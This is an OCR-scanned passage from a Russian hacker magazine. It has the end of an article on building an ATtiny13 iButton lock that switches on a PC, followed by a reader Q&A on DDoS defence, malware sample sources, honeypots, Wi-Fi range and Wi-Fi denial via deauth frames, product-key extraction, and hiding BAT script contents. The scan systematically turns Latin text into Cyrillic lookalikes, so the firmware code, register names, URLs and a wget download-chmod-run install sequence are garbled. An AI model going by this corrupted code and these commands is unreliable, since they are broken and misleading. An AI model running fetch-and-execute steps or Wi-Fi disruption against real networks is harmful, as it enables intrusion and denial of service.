компа. На ней есть напряжение 5 V, даже когда компьютер выклю- 
чен (разумеется, не из розетки). Тогда вместо двух источников пита- 
ния (5 V и батарейка) в схеме будет всего один. 



1-ѵѵіге 

Протокол 1-ѵѵіге, по которому ключ общается с домофоном, описан в 
каждом втором блоге по электронике. Но я все же повторюсь и рас- 
скажу, что это такое, и под каким соусом его едят. 

Физически шина 1-ѵѵіге состоит из одной линии, по которой переда- 
ются и данные, и питание. Эта линия подтянута к источнику питания 
(обычно 5 V) резистором в несколько килоом. Максимальный ток 
всех устройств на линии ограничивается этим резистором. Если 
устройству требуется больший ток, то можно подключить внешнее 
питание. Или подключать линию связи к питанию на то время, пока 
устройству нужен большой ток (например, так работают с термоме- 
тром 0518620). 

Все устройства на шине 1-ѵѵіге делятся на ведущих (тазіег) и 
ведомых (зіаѵе). В нашем случае мастером будет замок, а ведомым 
— ключ. Мастер может по своему желанию начать обмен данными, 
передавать ведомым устройствам команды и читать из них данные. 
Ведомые должны ждать, пока к ним обратится ведущий — сами они 
не могут начать обмен данными. 

Для передачи сигналов ведущий (или ведомый) прижимает линию 
к земле. В ведомом устройстве есть цепочка из диода и конденса- 
тора, которая позволяет ему работать, пока напряжение на линии 
болтается около земли. Единица передается коротким импульсом 
(5-10 микросекунд), а ноль — длинным (до 50-100 микросекунд). 
Между импульсами должна быть пауза в несколько микросекунд, 
чтобы конденсатор в ведомом устройстве успел зарядиться, и оно 
не сдохло на следующем импульсе. Кроме нуля и единицы есть два 
специальных сигнала: РЕ5ЕТ, длиной не менее 480 мкс, который 
подается ведущим перед началом обмена, и РРЕ5ЕІЧСЕ, длиной в 
1 00-200 мкс, его подает ведомый после того, как услышит сигнал 
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Рис. 1. Устройство в сборе. 
Второй (красный) светодиод 
не используется 
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Рис. 2. Передача и чтение данных на шине 1-\л/іге 



РЕ5ЕТ. При передаче байта сначала передается младший бит, а в 
конце — старший. 

Обмен данными между ведущим и ведомым идет по такому сценарию: 

1. Мастер подает сигнал РЕ5ЕТ. 

2 . Ведомый отвечает сигналом РРЕ5ЕІМСЕ (типа — «я здесь!»]. 

3. Ведущий подает РОМ-команду. У каждого ведомого есть 8 байт 
РОМ-памяти с уникальным кодом, по которому ведущий отличает 
их друг от друга. А у наших ключей (если точнее — микросхема 
О51990А — самая популярная модель іВиНоп) кроме этой памяти 
вообще ничего нет. 

4. В зависимости от команды мастер может прочитать РОМ-память 
ведомого или передать код нужного ему ведомого, чтобы продол- 
жить связь конкретно с ним. Мы будем читать РОМ-память ключа 
командой РеасІ РОМ (0x33). 

Первым байтом в РОМ-памяти идет код семейства. У О81990А — это 
0x01 . Дальше идет 6 байт серийного номера и байт СРС. Мы будем 
сохранять серийный номер целиком (вместе с кодом семейства и 
СРС) в ЕЕРРОМ. Считанный код ключа будем просто сравнивать с 
номером в памяти, без расчета СРС и прочих проверок на ошибки. 
Нашему замку понадобится как-то определять, что ключ появился 
на линии. Обычно эта задача решается регулярным опросом шины: 
мастер подает РЕ5ЕТ и ждет РРЕЗЕЫСЕ-сигнала от ведомого. Но 
такой способ нам не подходит — МК будет постоянно в активном 
режиме, то есть, расходовать батарейку. Можно использовать спя- 
щий режим, просыпаясь раз в несколько секунд, чтобы проверить 
наличие ключа. 

Но есть более красивое решение: МК настраивает внешнее пре- 
рывание так, чтобы оно сработало, когда линия связи прижимается 
к земле, потом переходит в спящий режим. В этом режиме отклю- 



чается вся периферия МК, даже тактовый генератор, и потребление 
снижается до долей микроампера. Когда ты тыкаешь ключом в пад, 
конденсатор в ключе начинает заряжаться и просаживает напря- 
жение на линии почти до нуля. Всего на несколько микросекунд, но 
этого хватит, чтобы прерывание сработало и вывело МК из спящего 
режима. Дальше он прочитает ключ, сравнит его с кодом в памяти 
и включит комп. 

Схема устройства 

Теперь пора поподробнее разобраться с железом. 

Микроконтроллер нам нужен простой и дешевый. Можно, конечно, 
поставить какой-нибудь понтовый АРМ, но вдоволь и ограничиться 
АТТіпуІЗ. К нему подключим кнопку «Іеагп», подтягивающий рези- 
стор для 1-ѵѵіге, зеленый светодиод (которым будем мигать, если 
ключ прошел проверку) и транзистор для управления БП компа (см. 
схему на рис. 6). Транзистор можешь взять любой маломощный, 
главное, чтобы он был типа ЫРІ\І. У меня были залежи ВС846 в мел- 
ком 5М0-корпусе, поэтому поставил его. 

Коллектор транзистора (XI) и его эмиттер (Х2) мы подключим к 
материнке вместо родной кнопки питания. Если перепутать кон- 
такты местами, то ничего страшного не произойдет, просто комп не 
будет реагировать на попытки его включить. Для питания схемы 
5 Вольт можно найти на любом незанятом разъеме в системном 
блоке. Например, почти у всех без дела болтается разъем флоппи- 
вода. От него нам нужны красный (+5) и черный провода. 

Оба источника питания (5 V от компа и батарейка) подключены через 
диоды. Нужно это для того, чтобы они не перекачивали ток друг-в- 
друга. При включенном компьютере ток идет в схему через диод Б1 , 
а 02 не дает ему испортить батарейку. Когда комп отключен, ток пой- 
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Рис. 3. Пример обмена данными между замком и ключом 



дет через 02, а йі не даст току от батарейки попасть в линию пита- 
ния компа. В качестве 02 лучше всего брать диод Шоттки. Он обла- 
дает маленьким падением напряжения, порядка 0,2 В. Если взять 
обычный диод, то МК может не хватить напряжения для работы. 

Сборка 

Плату я делал методом ЛУТ. Он уже упоминался на страницах журна- 
ла (см. материалы к статье «йі НАЕГа» в номере ][ 1 18, октябрь 2008 
года). Технология довольно проста и дает неплохие результаты. Плата 
для этого устройства должна получиться у тебя с первого раза. Ну, или 
со второго. Если нет желания заморачиваться с утюгом, то можешь 
собрать схему на макетной плате, благо деталей там совсем немного. 
Корпус можно сделать из чего угодно. Мой когда-то был корпусом от 
блока питания. Если ты решил поставить устройство в корпус компа, 
то можешь использовать в качестве основы заглушку от флоппивода 
или дисковода. В приложении к статье есть плата, нарисованная под 
заглушку от Е00. Посмотреть эту схему можно в бесплатной програм- 
ме ѴіеѵѵІ_ауоиІ ( ооо.дІ/кРКХЕ ). 

Пад под ключ тоже запросто делается из подручных материалов. 
Например, из обрезка какой-нибудь металлической трубки со вну- 
тренним диаметром не меньше 1,6 см. Вариантов на самом деле 
много, здесь сам выбирай, исходя из того, что есть под рукой. Я сде- 
лал пад из куска провода, скрученного в кольцо, залитого припоем и 
припаянного на плату. Потом выяснилось, что получилось слишком 
высокое кольцо (реально там хватает и пары миллиметров), поэтому 
на круг в центре пришлось припаять гайку. Выглядит забавно. 

Алгоритм работы 

В качестве языка разработки я выбрал Паскаль. Вообще, 95% про- 
грамм под МК пишутся на Си или ассемблере, но первый я на АѴР 
не пользую, а второй только в виде вставок по ходу программы. За 
компилятор сойдет МікгоРазсаІ к) г АѴР (буква «к» — не баг, а фича). У 
него ограничение до 2 КБ кода в бесплатной версии. Этого нам более 
чем достаточно — у ТіпуІЗ всего 1 КБ флеш-памяти. 

В начале, при подаче питания нужно инициализировать периферию. 
Большая часть устройств не используется, поэтому мы их не трогаем. 

АСБК.АСЭ := 1; //Отключаем аналоговый компаратор 
ЭйКВ := %00010Ѳ01; //Переключаем на выход 
//пины: В4 (транзистор) и В0 (светодиод) 

РСЖТВ := %00001001; //Включаем подтягивающий резистор на кнопке 

МСІІСК.5М0 := 1; //Тип спящего режима - ромег сіомп 

МСІІСК.5Е := 1; //Спящий режим разрешен 

азт зеі епсі; //Глобально разрешаем прерывания 

После того, как МК настроит периферию, он продолжает работать в 
обычном режиме. 

СІРК.ІІМТР0 := 1; //Сбрасываем флаг прерывания 
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СІМ5К.ІІМТ0 := 1; //Разрешаем прерывание 
азт зіеер епсі; //Отбой! 

Настраивает прерывание ІІМТО (которое висит на ножке В1) и пере- 
ходит в спящий режим. 

Обрати внимание, что остальной код (чтение ключа, сравнение и 
включение компа) идет сразу после команды зіеер. Когда произойдет 
прерывание, МК проснется и бросится в обработчик I N Т 0_гц . В этом 
обработчике только одна команда — отключение прерывания, чтобы 
оно не возникало во время обмена данными с ключом. После обра- 
ботчика МК вернется к тому месту, откуда он прыгнул в прерывание (к 
команде зіеер) и начнет выполнять код дальше. 

0е1ау_тз(2); //Задержка, чтобы ключ успел 
//выйти в рабочий режим 
РРКВ.1 := 1; //Даем КЕ5ЕТ 
Ое1ау_из(500); 

ООЯВЛ : = 0; 

Ое1ау_из(50); 

//Ждем, после этого линия должна быть прижата 
//к земле РКЕБЕІМСЕ-сигналом 
і-р РІІ\ІВ.1=1 1:Меп соп1:іпие; 

// Если РКЕ5ЕІМСЕ нет, то прерываем процесс 
Ое1ау_из(250); //Ждем еще немного 
//РКЕБЕІМСЕ-сигнал должен закончиться 
КеасІ_іВи1:1:оп; //Читаем ключик 
і-р СКС_ОК о 0 -Рііеп сопііпие; 

//Если СКС не совпало - попробуем еще раз 

Сначала он ждет несколько миллисекунд. Нужно это для того, чтобы 
конденсатор в ключе полностью зарядился, и он вошел в рабочий 
режим. Потом МК подает РЕЗЕТ-сигнал. Для этого он переключает 
бит 1 в регистре ВЮРВ. Каждый бит этого регистра отвечает за соот- 
ветствующую ножку МК. Единица означает, что ножка настроена на 
выход, а логический уровень на ней (проще говоря, напряжение) 
задается битом в регистре РОРТВ (у нас туда записан ноль). Ноль 
в ОйРВ значит, что ножка настроена на вход. Вот и получается, что 
записав в ОйРВ 1 , МК прижимает ножку к земле, а записав 0 — отпу- 
скает, и ножка висит на внешнем риіі-ир-резисторе. После РЕ8ЕТ- 
сигнала МК проверяет, есть ли сигнал РРЕЗЕЫСЕ. Если нет, то идет 
снова спать — это был не ключ, а какая-то помеха. Если же ключ 
ответил, то МК выполняет процедуру чтения. Ее код я приводить не 
буду, ибо он довольно большой. В этой процедуре происходит вот ЧТО: 

1. Сначала подается команда на чтение РОМ-памяти — 0x33. 

2 . После этого МК читает 8 байт, попутно считая СНС: результат этих 
подсчетов он запишет в переменную СНС_0К. 

3. Прочитанные байты складываются в массив Р0М_0а1а. 

Для расчета СРС используется табличка на 256 байт. Вначале пере- 
менная СРС обнуляется, и с каждым байтом кода проводится такое 
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Рис. 4. Сигналы ВЕЗЕТ и РВЕ5ЕІЧСЕ, предваряющие каждый 
обмен данными 



действие — СРС := СРС_ТаЫе[СРС хог ОаІаВуІе];. В результате, если 
все байты передались верно, в конце СРС будет = 0. СРС вычис- 
ляется при каждом чтении ключа, «на лету». После выполнения 
функции РеабРОМ-программе остается только посмотреть на пере- 
менную СРС_ОК. Если она = 0, то ключ прочитался верно. Если тебе 
интересен «нормальный» алгоритм расчета СРС, без таблицы, то 
можешь заглянуть в документацию на іВииоп (есть на диске) или в 
«Википедию» (СРС8). 

Далее МК проверяет нажата ли кнопка «Іеагп». Если нажата, то только 
что прочитанный ключ записывается в ЕЕРРОМ, после чего МК снова 
идет спать. Если кнопка не нажата, то МК сверяет то, что он прочитал, 
с тем, что записано в ЕЕРРОМ. И если коды совпали — врубает комп. 
Потом пройдет небольшая пауза, цикл повторится снова, и МК заснет 
в ожидании ключа. 

Программатор и прошивка 

Наверное, самый важный вопрос связан с прошивкой микроконтрол- 
лера — как, чем, куда? 

Если у тебя есть рабочий программатор, который ты вполне успешно 
используешь, то эту часть можно невозбранно пропустить: здесь рас- 
сказывается о том, как собрать простенький программатор для АѴР и 
прошить с его помощью МК. 

Программаторов для АѴР существует целая куча. Но здесь мы рассмо- 
трим одну из самых простых и «дубовых» моделей — программатор 
Громова. 

Этот программатор подключается к СОМ-порту. Со всякими переход- 
никами ІІ5В<-э€0М работает очень плохо. Гораздо лучше с переход- 
никами РСІ<-^СОМ или «железным» портом. Если на заднице компа 
ничего похожего на СОМ-порт не заметно, это не значит, что его нет. 
Возможно, разъем просто не распаян на плате, а место под него есть. 
В таком случае можно либо попытаться запаять разъем на место, 
либо забить и не рисковать материнкой :). 

Для сборки программатора тебе понадобятся семь резисторов и три 
диода. Немного, правда? :) 

Резисторы можно взять номиналом от 1 до 10 килоом, диоды — 
любые из маломощных. 

Схему программатора ты можешь видеть на рис. 5. Собрать его можно 
хоть на макетке, хоть просто навесным монтажом. Обрати внимание, 
что питание для МК при прошивке нужно брать из отдельного источ- 
ника. Если этот источник связан с компом (например, +5 В от 115В), то 
достаточно просто подключить его к ножке Ѵсс МК. Если же источник 
это какой-то внешний БП или батарейка, то нужно прицепить к МК не 
только питание, но и землю (Спб). 

Для работы с этим программатором используется программка СІпіргоГ 
Ее ты можешь найти на диске. 

При запуске ІІпіргоІ 1 автоматически проверяет, подключен ли МК, и 
показывает его название. Подключив к программатору АТТіпуІЗ, ты 
должен увидеть над окошком ПазГі синюю надпись «[1 К, 64] ТіпуІЗ» — 

1 килобайт флеш-памяти и 64 байта ЕЕРРОМ. Если вместо этого про- 
граммка выкидывает тебе сообщение об ошибке, то проверяй сборку 
(замыкания или непропай) и правильность подключения. 

Перед прошивкой флеш-память надо очистить кнопкой «Егазе». 
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Рис. 5. Схема программатора Громова 



Потом загружаем файл с прошивкой кнопкой «открыть» с надписью 
«Ьех» (он лежит в приложении к статье, в папке Ггтѵѵаге). Слева 
появляется содержимое файла в шестнадцатеричном виде. Осталось 
только нажать «РРОО» для начала прошивки. Если в процессе про- 
шивки возникнут ошибки, то стоит попробовать укоротить провода от 
программатора до МК. В идеале их длина должна быть не больше 10 
см. Также стоит прозвонить схему тестером на предмет замыканий 
или разрывов. 

Для правильной работы программы тебе потребуется выставить Іъізе- 
биты. Это специальные настроечные флаги, позволяющие менять 
частоту МК, источник тактового сигнала и другие параметры. Здесь 
надо соблюдать осторожность — если неправильно выставить фьюзы, 
то можно заблокировать МК. 

Тебе надо отключить флаг СКОІѴ8, который отвечает за делитель так- 
товой частоты. По умолчанию он включен, и МК работает на частоте 
1 ,2 МГц, а нам нужно 9,6 МГц. Для работы с Фзе есть кнопка с соот- 
ветствующим названием. В окошке Фзе ты увидишь список всех фью- 
зов для этого МК. Перед тем как что-то менять, надо нажать кнопку 
«Реаб» под нужной колонкой, чтобы прочитались текущие значения 
флагов. Фьюзы в АѴР инверсные, то есть пустой квадратик напротив 
СКОІѴ8 значит, что делитель включен. Для того чтобы его отключить, 




ставь галочку напротив фьюза и нажимай кнопку «ѴѴгіІе», под нужной 
колонкой. Все, флаг выставлен и начнет действовать после переза- 
пуска МК. 

Заключение 

Устройство получилось довольно простое, но вместе с тем полезное. 
Конечно, какой-либо надежной защиты компьютеру оно не дает, но 
спасти от посягательств младшего брата вполне может :). Да и соз- 
давалось оно мной, в первую очередь, для изучения АѴР и протокола 
1 -ѵѵіге. Впрочем, замок можно использовать не только для включения 
компа. Ты можешь подключить к нему реле и управлять электромаг- 
нитным замком, или сервомашинку — для того, чтобы открывать и 
закрывать дверь. Главное — твоя фантазия и умение применить воз- 
можности МК. т 
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Есть вопросы — присылай 
на Іад@геаІ.хакер.ги 



О: У меня вопрос по защите от ОйоЗ. Как 
люди умудряются отбиваться от большого 
количества паразитного трафика без 
какого-либо дорогостоящего оборудо- 
вания? 

А: Если атака не носит масштабного харак- 
тера, то неплохо справиться с ситуацией мо- 
жет помочь даже просто ірІаЫез. В «Колонке 
редактора» прошлого номера я рассказы- 
вал, как прикрутить к файрволу геомодуль, и 
в случае необходимости эффективно блоки- 
ровать все запросы из нежелательных стран 
(например, Китая). Увы, это самый простой 
случай. Относительно несложное решение 
предоставляеттакже проект ЮЮоЭ Оебіаіе 
( сіейаіе.тесііаіаѵег.сопп ). Это ЬазЬ-скрипт, 
который ведетсписок ІР-адресов, с которых 
осуществляются коннекты, а также количе- 
ство подключений с каждого из них. Логика 
более чем тривиальная: при достижении 
определенного количества коннектов, все 
последующие просто блокируются в течение 
некоторого времени. Блокировка осущест- 
вляется стандартным файрволом: ірІаЫез 
или АбѵапсесІ Роіісу Рігеѵѵаіі (АРР). Установ- 
ка йоВ йеЛаІе предельно упрощена: 



м§е1: Ы:1:р://ыыы. іпеІіЬаБе. сот/Бсгірѣв/ 
сІсІ05/іп5І:а11. БІі 
сіітосі 0700 іп5І:а11.5Іі 
./іп5І:а11.5Іі 

Количество возможных подключений за- 
дается через конфиг/изг/іосаі/ббоз/бсіоз. 
сопі 1 в параметре М0_0Р_С0ММЕСТІ0М5. 
Рекомендую установить это значение 
побольше, чтобы случайно не забанить 
группы людей, которые работают через 
ЫАТ. Тут надо сказать, что используемый 
подход довольно примитивен. Более 
продвинутые решения, предлагаемые 
специализирующимися на защите от 
подобных атак компаниями, используют 
рейтинговые системы. То есть, решение о 
блокировке принимается не «втупую» на 
основе количества подключений, а только 
если он действительно «проштрафит- 
ся». Для каждого посетителя с помощью 
интеллектуальной системы производится 
поведенческий анализ, который на основе 
некоторых формальных признаков может 
дать ответ, с кем мы имеем дело: с обыч- 
ным юзером или ботом. 



О Многие ресерчевы активно делятся 
результатами своих исследований новых 
образцов малвари. Но где они их берут? У 
них же нет доступа к базам антивирусных 
компаний, верно? 

А: Можно выделить несколько основных 
источников. 

Во-первых, есть немало ресурсов, где 
активно агрегируется большое количество 
тел вирусов. Это и форумы, где энтузиасты 
активно делятся своими образцами (в том 
числе и сотрудники антивирусных вендо- 
ров), и специализированные, автоматиче- 
ские сервисы. Известный эксперт в области 
ИВ Лен ни Зелцер ведетсписок подобных 
ресурсов, ивне го сейчас входят следующие 
проекты: 

• Асіппіпиз Маіѵѵаге Апаіузіз Огоир Батріез 
(асіппіпиз.пеі/затріез.азрх ); 

• Сопіадіо Маіѵѵаге Ритр ( сопіадіосіиппр. 
ЫодзроЕсот ): 

• КегпеІМосІе.іпІю ( ѵѵѵѵѵѵ.кегпеІппосІе.іпЬ/ 
богит/ѵіе\д/1 : огипп.рЬр?1 : =1 6 ): 

• МаІУѵагеВІаскІізІ ( ѵѵѵѵѵѵ.таІѵѵагеЫаскІізІ:. 
сот/5І"іоѵѵМР1_.рЬр ); 

• МаІѵѵагеВуІез Еогит ( Ьгитз. 
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Удаленный доступ к компьютеру на 
аппаратном уровне 

таІл/ѵагеЬуІез.огд ); 

• ІМоѵСоп ТѵѵіІТег ЕХЕ Рагзіпд 
( тіпоіаигапаіузіз.сот/ехеіѵѵееі: ); 

• СНТепзіѵе Сотриііпд [ ѵѵѵѵѵѵ. 
о^епзіѵесотриііпд.пеі: ); 

• ЭесиВох ЬаЬз [ зесиЬохІаЬз.і ). 

Во-вторых, загрузить образцы актуальной 
малвари можно оттуда, откуда злоумыш- 
ленники их впаривают пользователям, — с 
зараженных сайтов. Списки «опасных» 

ІІРІ_ доступны на ѵѵѵѵѵѵ. т а Іѵѵа геботаіпіізі:. 
сот и ѵѵѵѵѵѵ. та Іѵѵа геи К. сот . Дальше подход 
нехитрый: запускаем виртуальную машину, 
открываем в старом непатченном браузере 
один сайт за другим и, анализируя измене- 
ния в файловой системе и реестре, удив- 
ляемся, насколько легко можно подцепить 
троя, просто серфя инет. 

В-третьих, никто не мешает поднять свои 
собственные ЬопеуроСы, какэто делают 
антивирусные компании. Это сеть из наме- 
ренно уязвимых хостов, которые с большой 
вероятностью будут атакованы малварью. 

О: Так, а как такие хонипоты 
поднять самому? 

А: Если говорить начистоту, то для сбора 
образцов вирусов на 1 00% не подходит ни 
один существующий проект. Но можно по- 
пробовать следующие: 

• ОІазІорНдІазІодЕощ) — это веб- 
приложение, которое эмулируеттысячи 
различных веб-уязвимостей для сбора 
различных данных и информации о прово- 
димой атаке. Среди этих данных легко могут 
оказаться и образцы малвари. 

• Ріопаеа ( сііопаеа.сагпіѵоге.іі: ) — специ- 
альный хонипот, заточенный для сбора 
образцов зловреда. Для этого решение 
эмулирует различные бреши безопасности в 
различных службах ѴѴіп б оѵѵб, которые часто 
используются для заражения системы. 
СІіопаеа реализован довольно здорово 

и дажеумеетэмулировать исполнение 
шеллкода. 

• бзипраск-п ( собе.доодіе.сот/р^'зипраск-п ) 

— этотхонипот работает на стороне клиента 
и эмулируетуязвимый браузер. Утилита 
спроектирована таким образом, чтобы взаи- 
модействовать с зараженным веб-сайтом в 
автоматическом режиме. 

Есть и много других проектов, на при - 




Включаем возможность использовать 
несколько аккаунтов Ооодіе 
одновременно 



мер, Отпіѵога ( гоигсеІюгде.пеіУрго]^^/ 
отпіѵога ] и Атііп ( зоигсеЬгде.пеі/ргоіесІз/ 
атипбопеу ). 

О: Каким способом можно обеспечить 
себе возможность подключения к удален- 
ному рабочему столу даже если он завис 
или выключен? 

А: Еще недавно я не мог ответить на этот 
вопрос, но теперь хочу рассказать тебе об 
одной чумовой фишке, которая появилась 
в новых процессорах Іпіеі Соге і 5/і 7. На- 
чиная с этой серии процов, компания Іпіеі 
представила платформу ѵРго и технологию 
КѴМ Петоіе Сопігоі. Аббревиатура КѴМ 
(КеуЬоагб Ѵібео Моизе) возможно тебе уже 
знакома: КѴМ-переключатели часто ста- 
вятся в серверных и позволяютуправлять 
нескольким компьютерами с одних и тех же 
— клавиатуры, мыши и монитора. Что озна- 
чает появление КѴМ в платформе Іпіеі? 

То, что ты можешь управлять компьютером 
независимо оттого, в каком состоянии он 
находится. Даже если он завис или вообще 
выключен, к нему можно подключиться 
и, получив изображение с видеокарты, 
разрулить любую ситуацию. Привлека- 
тельность технологии добавляет тот факт, 
что для удаленного доступа используется 
знакомый протокол Ретоіе РгатеВиІТег 
(более известный какѴІЧС), а, значит, 
есть сотни самых разных клиентов для 
любых, в том числе мобильных платформ. 
Управлять компьютером с любого смарт- 
фона на том же Ап б го іб, как тебе? И это 
на полностью аппаратно реализованной 
технологии. Если компьютерты приобрел 
недавно, не исключено, что эта радость в 
твоем процессоре уже есть. Уточнить это 
можно в специальном разделе на сайте 
Іпіеі ( іпІе[.Іѵ/рдТп6М ). в котором приведен 
список совместимых с ѵРго процов. Обрати 
внимание на графу«КѴМ Ретоіе Сопігоі 
Виррогі». Но сразу предупреждаю: опция 
будет работать, только если ты исполь- 
зуешь интегрированные видеоадаптер и 
сетевую карту. 

О: Можно ли как-нибудь увеличить 
уровень ѴѴі-Н-сигнала от точки доступа? 

В одной из отдаленных комнат прием 
нестабильный и хотелось бы как-нибудь 
исправить эту ситуацию. Предложи 
варианты. 




Увеличиваем мощность передатчика 
точки доступа 



А: 1 . Выбросить стандартную антенну и при- 
обрести более мощную всенаправленную 
(ищи по ключевым словам отпі апіеппа). 

2. Попробовать обойтись без лишних за- 
трат и решить вопрос исключительно на 
софтварном уровне. Для большинства точек 
доступа существуют альтернативные про- 
шивки, например, ОО-ѴѴПТ, предлагающие 
гораздо больше настроек в сравнении со 
стандартным интерфейсом управления. 

Если перейти на вкладку «ѴѴігеІезз -> 
Абѵапсеб ЭеШпдз», то несложно заметить 
там параметр «ТХ Роѵѵег», указывающий 
мощность передатчика. Стандартное 
значение, как прав ил о, равняется 70, но его 
вполне можно незначительно увеличить 

до 1 00 (умельцы уверяют, что это вполне 
безопасно). Дальнейшее увеличение грозит 
чрезмерным тепловыделением, что чревато 
для здоровья роутера. Хотя на своей АР я 
выставил значение 1 50 и никаких проблем 
пока не заметил. Поддерживает ли твоя 
точка ОО-ѴѴРТ, можно уточнить на сайте 
разработчика ( ѵѵѵѵѵѵ.бб-ѵѵгЕсот ). 

3. Помимотвика сувеличением мощности 
передатчика рекомендую поиграться с 
каналом, на котором работаетточка доступа. 
Достаточно запустить любой сканер ѴѴі-РІ- 
сетей (например, іпЭЭЮег) и посмотреть, 
какой из каналов в помещении еще не ис- 
пользуется другими сетями. На него и надо 
переключиться. 

4. Если и это не помогает, то самый верный 
способ — приобрести еще одну АР (благо 
цены на них все падают и падают) и пере- 
вести ее в режим повторителя. Последнее 
делается очень просто. В случае с прошив- 
кой ОО-ѴѴРТ достаточно перейти в раздел 
«ѴѴігеІезз -> Вазіс Эеиіпдз» и поменять ре- 
жим работы на «Ререаіег». Ты увидишь две 
секции: «ѴѴігеІезз РЬузіса 1 1 піегбасе (ѵѵІО)» 
и «Ѵігіиаі Іпіегіюсез (ѵѵЮ.1)». Физический 
интерфейс должен принимать сигнал от 
главного роутера, поэтомуукажи 55Ю своей 
основной беспроводной сети. В разделе 
«ѴѴігеІезз Эесигііу» необходимо настроить 
параметры подключения. 
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О: А есть ли способы заддосить беспро- 
водную сеть? Сделать так, чтобы пользо- 
ваться ей стало невозможно. 

А: Факт использования общей среды, то 
есть, радиоэфира, создает для любой бес- 
проводной технологии ряд сложностей. В 
случае с ѴѴі-Рі, как мы знаем, ничего не стоит 
создать фрейм деавторизации и отключить 
любого клиента отточки доступа. Уже даже 
это может быть использовано злоумышлен- 
ником, чтобы серьезно помешать работе 
беспроводной сети. Есть уязвимости и в 
оборудовании. Я говорю о ситуации, когда 
девайсы неправильно отрабатывают ситуа- 
ции с намеренно неправильно созданными 
беспроводными фреймами. Недавнодаже 
появился проект ѴѴІР 1122 ( сосіе.доодіе.сот/р/ 
уѵііи гг], представляющий собой фаззер, на- 
меренно создающий сложные ситуации для 
сетевого стека современныхточек доступа. 

В его основе лежит Руібоп -библиотека 
Беару, позволяющая конструировать произ- 
вольные сетевые пакеты. 

О: Попросили переставить винду на ноут- 
буке. Система лицензионная, но наклейки 
на обратной стороне девайса уже нет. 

Не хочется устанавливать пиратку. 

Как вытащить серийник из системы? 

А: Проще всего заюзать утилиту РгобиКеу 
( ѵѵѵѵѵѵ.пігзоіі.пеі ). которая как раз и из- 
влекает из системы ключи для продуктов 
Місгозоіі ОШ се, ѴѴіпсІоѵѵз, Ехсбапде Зегѵег 
и 5СН_ Зегѵег. Тотже самый трюк несложно 
провернуть с удален ной и даже нерабочей 
системой (а это бывает сплошь и рядом). 
Главное — добраться до папки %\л/іпсііг%\ 
зузІет32\сопІід. 

О: Хочу с друзьями развернуть что-то 
вроде ОгорЬох'а, но только на своем соб- 
ственном сервере. Чтобы уж точно быть 
уверенным в неприкосновенности дан- 
ных. Есть ли толковые готовые решения? 
А: Самым мощным клоном ОгорЬох’а явля- 
ется БрагкІеБЬаге ( зрагкіезбаге.огд ). Он во 
многом повторяет функционал известного 
сервиса, но при этом распространяется с 
открытыми исходными кодами. Уже сейчас 
разработчики предлагают клиенты для І_іпих 
и Мае, а скоро обещают выпустить релиз для 
винды и мобильных платформ. Исходные 
коды всегда доступны с репозитория дііЬиЬ. 
сот/ИЬопз/ЕрагкІеВбаге . 

О: Пишу на Роѵѵег5беІІ/ВАТ небольшие 
вспомогательные скрипты для решения 
рутинных задач. Хочу, чтобы по заверше- 
нии некоторых действий в окне уведом- 
лений ѴѴіпсІоѵѵз появлялись всплывающие 
сообщения, отражающие текущий статус 
выполнения задачи. Как это можно 
сделать? 

А: Отобразить всплывающие сообщения в 
области трея можно было бы через ѴѴіпАРІ, 



но делать та кие вызовы из скриптовых 
языков — это то еще извращение. Быстро и 
изящно решить проблему способна неболь- 
шая консольная утилита поіііи ( ѵѵѵѵѵѵ.рагаііпі. 
сот/рго]есІз/поІІІи ). Ты передаешь ей 
необходимые параметры через командную 
строку, а она уже отображаетуведомление в 
трее, используя необходимые системные вы- 
зовы. Например, так: 

по1:і-Ри /т "Неііо., тап!" 

Получается, что для вывода сообщений нам 
достаточно вставить вызов поіііи в нужных 
местах нашего сценария. 

О: Есть ли способ зашифровать содержи- 
мое ВАТ-файла? Не хочу, чтобы действия, 
которые он выполняет, легко читались 
простым открытием его в блокноте. 
Вопрос актуален также для сценариев 
на РоѵѵегЗсгірІ и ѴВЗсгірІ. 

А: Если не брать в расчет различные спосо- 
бы обфускации, то, пожалуй, самый верный 
способ — преобразовать его в исполняемый 
ехе-файл. Например, с помощью утилиты 
Оиіск Ваісб Еііе Сотрііег ( ѵѵѵѵѵѵ.аЬѵззтесІіа. 
сот/диіскЫс ). Для скриптов на ѴВЗсгірІ и 
ЗаѵаБсгірІ есть БсгіріСгурІог Сотрііегот 
того же разработчика. В случае если нужно 
провернуть тот же фокус со скриптом на мод- 
ном нынче РоѵѵегЗсгірІ, пригодится утилита 
Маке-Р51 ЕхеѴѴгаррег [ ЬІІ.Іѵ/раІдІѴѴ ). Под- 
ходящая опция предлагается еще и в среде 
разработки РгітаІЗсгірІ ( ѵѵѵѵѵѵ.заріеп.сот/ 
зоііѵѵаге/ргітаізегірі ). которая помимо про- 
чего может похвастаться весьма недурными 
инструментами для отладки. 

О: С чего лучше всего начать юзабилити 
(слово-то какое!) существующего веб- 
приложения? 

А: Если ресурс уже запущен и работает, 
то самую лучшую пищу для размышления 
могут предоставить сами посетители. 
Вместе со страницей можно подгружать 
небольшой код на ЗаѵаЗсгірІ, который 
будет отслеживать каждый клик пользо- 
вателя и проводить небольшой анализ. На 
основании этих данных можно построить 
так называемые Ьеаітар’ы — графики, 
наложенные на скриншот сайта и показы- 
вающие «горячие» и «холодные» зоны. Чем 
больше кликов было сделано в какой-то 
конкретной области, тем ярче отмечается 
пятно на графике. Благодаря такой визуа- 
лизации несложно определить наиболее 
удачные элементы в интерфейсе, а также 
откровенно слабые места, которые пользо- 
вателями по какой-то причине игнорируют- 
ся. В качестве конкретного решения могу 
посоветовать СІіскНеаІ ( ѵѵѵѵѵѵ. Іа Ьз теска. 
сот/сІіскГіеаі ). Статистику по кликам также 
предоставляет бесплатные сервисы боодіе 
Апаіуіісз и Яндекс. Метрика. 



О: Возможно ли одновременно ис- 
пользовать несколько аккаунтов СМаіІ в 
одном браузере, и быстро между ними 
переключаться? Сейчас для того, чтобы 
не геморроиться со входом/выходом из 
аккаунта, я использую разные браузе- 
ры. Надо ли говорить, что это не сильно 
удобно? :) 

А: Можно! И если раньше для этого при- 
ходилось использовать дополнительные 
плагины для браузеров, позволяющих 
быстро переключать сессии, то теперь 
такая возможность предоставляется самим 
Ѳоодіе’ом. 

Немногие знают, но множественный вход 
(так называемые Ми Иіріе зідп-іп) в два 
клика включается в настройках профиля. 
Надо лишь заглянуть на страницу доодіе. 
сот/ассоипіз . Правда, Ооодіе честно 
предупреждает, что опция пока доступна не 
для всех сервисов. 

О: Задача — реализовать на сай- 
те удобный механизм для загрузки 
файлов через веб-интерфейс. С нуля 
